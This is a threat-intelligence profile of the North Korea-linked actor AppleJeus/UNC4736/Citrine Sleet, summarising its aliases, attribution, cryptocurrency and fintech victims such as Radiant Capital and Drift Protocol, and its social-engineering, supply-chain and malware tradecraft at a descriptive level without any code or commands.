AppleJeus

AppleJeus is a North Korean state-affiliated threat actor tracked as UNC4736 and Citrine Sleet, with additional aliases including Gleaming Pisces, Labyrinth Chollima, Golden Chollima, Nickel Academy, and DEV-0139/DEV-1222 in the provided content. Multiple sources in the content assess the group as operating with a DPRK nexus, and Mandiant is cited as assessing with high confidence that it is aligned with North Korea’s Reconnaissance General Bureau (RGB). The content also describes UNC4736 as a sub-cluster within the Lazarus Group. The actor is focused heavily on cryptocurrency and fintech targets for financial theft. Reported victimology in the content includes Radiant Capital, Drift Protocol, the 3CX supply chain attack, a European fintech company, and broader cryptocurrency, DeFi, fintech, and supply-chain vendor ecosystems. The content states the group has targeted the cryptocurrency sector for financial theft since at least 2018 and references prior U.S. government reporting that North Korea used fake cryptocurrency trading platforms to infect victims with AppleJeus malware. Tradecraft described in the content centers on long-running social engineering, supply-chain compromise, and malware-enabled intrusion. In the 2024 Radiant Capital intrusion, attackers used a Telegram impersonation lure to deliver the INLETDRIFT macOS backdoor to hardware-wallet signers, enabling compromise of a multisig workflow and theft of about $50 million. In the 2026 Drift Protocol intrusion, the group allegedly spent roughly six months building trust through conference meetings, Telegram conversations, onboarding activity, and a deposited stake before compromising contributors via a malicious code repository and/or a trojanized wallet distributed through Apple TestFlight. The Drift reporting also describes abuse of malicious Visual Studio Code tasks.json behavior, pre-signed durable nonce transactions, manipulated CarbonVote Token collateral, and rapid draining of protocol vaults. The content also links AppleJeus to the 2023 3CX supply chain attack. Techniques explicitly mentioned include use of the COLDCAT C2 over HTTPS with cookie headers containing data, hosting icon files with embedded C2 URLs in a GitHub repository, exploitation of Chrome vulnerability CVE-2022-0609 via a drive-by compromise website, and use of ICONICSTEALER to steal browser information including browser history. Additional reporting in the content states Microsoft observed Citrine Sleet exploiting a Chromium zero-day in 2024. Further activity in the content includes fraudulent recruitment and job-themed operations, including delivery of malicious Python packages via PyPI to deploy PondRAT and POOLRAT/SIMPLESEA-related tooling, with Unit 42 linking that activity with moderate confidence to Gleaming Pisces/UNC4736. The content says these campaigns used fake job offers under the broader Operation Dream Job theme and were aimed at gaining access to supply-chain vendors through developer endpoints. A separate late-2024 incident in the content describes a fraudulent recruitment scheme delivering malicious Python packages to a European fintech company, followed by lateral movement into cloud resources and diversion of cryptocurrency to attacker-controlled wallets. Overall, the provided content characterizes AppleJeus/UNC4736/Citrine Sleet as a DPRK-linked, financially motivated state actor specializing in cryptocurrency theft, social engineering, supply-chain compromise, and cross-platform malware operations against crypto, DeFi, fintech, and related technology targets.